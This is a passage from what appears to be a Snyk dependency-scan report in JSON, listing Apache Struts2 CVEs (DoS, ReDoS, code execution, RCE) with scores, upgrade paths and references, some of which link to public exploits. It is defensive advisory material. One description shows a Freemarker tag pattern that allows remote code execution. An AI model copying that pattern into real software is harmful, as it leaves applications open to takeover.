"2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + 
"malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-051.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:51.883631Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:13.751396Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:51.883631Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (ReDoS) attacks. The REST Plugin is using outdated XStream library which is vulnerable and allow perform a DoS attack using malicious request with specially crafted XML payload.\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.34, 2.5.13 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-051.html)\n", + "epssDetails": { + "percentile": "0.99002", + "probability": "0.93195", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9793" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-08-23T21:00:00Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-12T12:47:32.905000Z", + 
"severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:51.883631Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31503", + "title": "Arbitrary Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "credit": [ + "Lupin", + "David Greene", + "Roland McIntosh" + ], + "semver": { + "vulnerable": [ + "[,2.3.34)", + "[2.4,2.5.12)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + "2.3.34", + "2.5.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-053", + "title": "Apache Security Bulletin" + }, + { + "url": "https://github.com/brianwrf/S2-053-CVE-2017-12611", + "title": "Exploit" + }, + { + "url": "https://github.com/apache/struts/commit/2306f5f7fad7f0157f216f34331238feb0539fa", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/637ad1c3707266c33daabb18d7754e795e6681f", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-12611.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:50.788695Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:02.858095Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:50.788695Z" + } + ], + "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nAffected versions of this package are vulnerable to arbitrary code execution. Using expression literals or forcing expressions in Freemarker tags (see example snippet below), and using request values can lead to remote code execution.\r\n\r\n```xml\r\n<@s.hidden name=\"redirectUri\" value=redirectUri />\r\n<@s.hidden name=\"redirectUri\" value=\"${redirectUri}\" />\r\n<@s.hidden name=\"${redirectUri}\"/>\r\n```\r\n\r\nIn both cases a writable property is used in the value attribute and in both cases this is treated as an expression by Freemarker. 
Please be aware that using Struts expression evaluation style is safe:\r\n\r\n```\r\n<@s.hidden name=\"redirectUri\" value=\"%{redirectUri}\" />\r\n<@s.hidden name=\"%{redirectUri}\"/>\r\n```\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.12` or higher.\r\n\r\n## References\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-053)", + "epssDetails": { + "percentile": "0.99858", + "probability": "0.97300", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-12611" + ], + "CWE": [ + "CWE-20", + "CWE-502" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-06T17:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-09-05T17:28:23Z", + "exploitDetails": { + "sources": [ + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-06T17:28:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:22.617066Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-32477", + "title": "Remote Code Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "credit": [ + "Man Yue Mo" + ], + "semver": { + "vulnerable": [ + "[2.3.0, 2.3.35)", 
+ "[2.5.0, 2.5.17)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.35", + "2.5.17" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ], + "functionId": { + "filePath": "com/opensymphony/xwork2/ActionChainResult.java", + "className": "ActionChainResult", + "functionName": "execute" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://exploit-db.com/exploits/45367", + "title": "Exploit DB" + }, + { + "url": "https://www.exploit-db.com/exploits/45367", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3", + "title": "GitHub Commit" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2018-11776", + "title": "Lgtm Blog" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1620019", + "title": "RedHat Bugzilla Bug" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-057", + "title": "Struts2 Security Bulletin" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:21.641643Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:35.323655Z" + }, + { + "type": "secondary", + "vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:21.641643Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Remote Code Execution. When the namespace value is not set for a result defined in underlying xml configurations, and in same time, its upper action(s) configurations have no or wildcard namespace, an attacker may be able to conduct a remote code execution attack. They could also use the opportunity when using a url tag which does not have a value and action set and in same time, its upper action(s) configurations have no or wildcard namespace.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.35, 2.5.17 or higher.\n## References\n- [Exploit DB](https://exploit-db.com/exploits/45367)\n- [Exploit DB](https://www.exploit-db.com/exploits/45367)\n- [GitHub Commit](https://github.com/apache/struts/commit/b3bad5ea44f3fd9edb2cb491192c5900f46d45d3)\n- [Lgtm Blog](https://lgtm.com/blog/apache_struts_CVE-2018-11776)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1620019)\n- [Struts2 Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-057)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2018/CVE-2018-11776.yaml)\n", + "epssDetails": { + "percentile": "0.99991", + "probability": "0.97527", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-11776" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2018-08-22T00:00:00Z", + 
"functions_new": [ + { + "version": [ + "[2.3.0, 2.3.35)", + "[2.5.0, 2.5.17)" + ], + "functionId": { + "className": "com.opensymphony.xwork2.ActionChainResult", + "functionName": "execute" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-08-17T00:00:00Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2018-08-22T11:53:44Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.324260Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.35" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-451610", + "title": "Improper Action Name Cleanup", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.3.29)", + "[2.5, 2.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29", + "2.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7", + "title": 
"GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:46:52.582114Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:23.840033Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.582114Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Improper Action Name Cleanup. 
It allowed attackers to have unspecified impact via vectors related to improper action name clean up.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/237432512df0e27013f7c7b9ab59fdce44ca34a5)\n- [GitHub Commit](https://github.com/apache/struts/commit/27ca165ddbf81c84bafbd083b99a18d89cc49ca7)\n", + "epssDetails": { + "percentile": "0.89903", + "probability": "0.02365", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4436" + ], + "CWE": [ + "CWE-459" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2019-07-16T11:14:42.540198Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-09-19T05:25:51Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-09-19T05:25:51Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.582114Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-460223", + "title": "Regular Expression Denial of Service (ReDoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)", + "[2.5,2.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + 
"2.3.29", + "2.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 5.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.316157Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", + "assigner": "NVD", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:51.243501Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The URLValidator class allows remote attackers to cause a denial of service via a null value for a URL field.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. 
There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.\n\nThe Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.\n\nLet’s take the following regular expression as an example:\n```js\nregex = /A(B|C+)+D/\n```\n\nThis regular expression accomplishes the following:\n- `A` The string must start with the letter 'A'\n- `(B|C+)+` The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the `+` matches one or more times). The `+` at the end of this section states that we can look for one or more matches of this section.\n- `D` Finally, we ensure this section of the string ends with a 'D'\n\nThe expression would match inputs such as `ABBD`, `ABCCCCD`, `ABCBCCCD` and `ACCCCCD`\n\nIt most cases, it doesn't take very long for a regex engine to find a match:\n\n```bash\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD\")'\n0.04s user 0.01s system 95% cpu 0.052 total\n\n$ time node -e '/A(B|C+)+D/.test(\"ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX\")'\n1.79s user 0.02s system 99% cpu 1.812 total\n```\n\nThe entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.\n\nMost Regex engines will work very similarly (with minor differences). 
The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as _catastrophic backtracking_.\n\nLet's look at how our expression runs into this problem, using a shorter string: \"ACCCX\". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:\n1. CCC\n2. CC+C\n3. C+CC\n4. C+C+C.\n\nThe engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use [RegEx 101 debugger](https://regex101.com/debugger) to see the engine has to take a total of 38 steps before it can determine the string doesn't match.\n\nFrom there, the number of steps the engine must use to validate a string just continues to grow.\n\n| String | Number of C's | Number of steps |\n| -------|-------------:| -----:|\n| ACCCX | 3 | 38\n| ACCCCX | 4 | 71\n| ACCCCCX | 5 | 136\n| ACCCCCCCCCCCCCCX | 14 | 65,553\n\n\nBy the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. 
These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29, 2.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/a0fdca138feec2c2e94eb75ca1f8b76678b4d152)\n- [GitHub Commit](https://github.com/apache/struts/commit/eccc31ebce5430f9e91b9684c63eaaf885e603f9)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4465)\n", + "epssDetails": { + "percentile": "0.99401", + "probability": "0.95900", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4465" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2019-08-23T13:23:19.812650Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:45:43Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-20T07:45:43Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:51.243501Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-5707101", + "title": "Allocation of Resources Without Limits or 
Throttling", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", + "credit": [ + "Matthew McClain" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.5.31)", + "[6.1.2,6.1.2.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.5.31", + "6.1.2.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "medium", + "cvssScore": 4.3, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21", + "title": "GitHub Commit" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-063", + "title": "Security Advisory" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:48:27.696682Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", + "assigner": "Snyk", + "severity": "medium", + "baseScore": 4.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:06:22.161472Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:27.696682Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to improper handling of `getProperty()` by the `XWorkListPropertyAccessor` class.\r\nExploiting this vulnerability is possible if the developer has set `CreateIfNull` to true for the underlying Collection type 
field.\r\n\r\n## Workaround\r\n\r\nSet `CreateIfNull` to false for Collection type fields (it is false by default if not set).\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.5.31, 6.1.2.1 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/2d6f1bc0a6f5ac575a56784ac6461816b67c4f21)\n- [Security Advisory](https://cwiki.apache.org/confluence/display/WW/S2-063)\n", + "epssDetails": { + "percentile": "0.86905", + "probability": "0.01484", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2023-34149" + ], + "CWE": [ + "CWE-770" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2023-06-14T10:02:40.213361Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2023-06-14T09:51:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2023-06-14T10:55:13.206157Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:27.696682Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.5.31" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-608097", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", + "credit": [ + "Matthias Kaiser" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.5.22)" + ] + }, + "exploit": "Functional", + "fixedIn": [ + 
"2.5.22" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://www.exploit-db.com/exploits/49068", + "title": "Exploit" + }, + { + "url": "https://github.com/PrinceFPF/CVE-2019-0230", + "title": "Proof Of Concept" + }, + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-059", + "title": "Security Bulletin" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2019/CVE-2019-0230.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:13.645371Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:03.579407Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O/RC:C", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:34.752855Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:13.645371Z" + }, + { + "type": "secondary", + "vector": 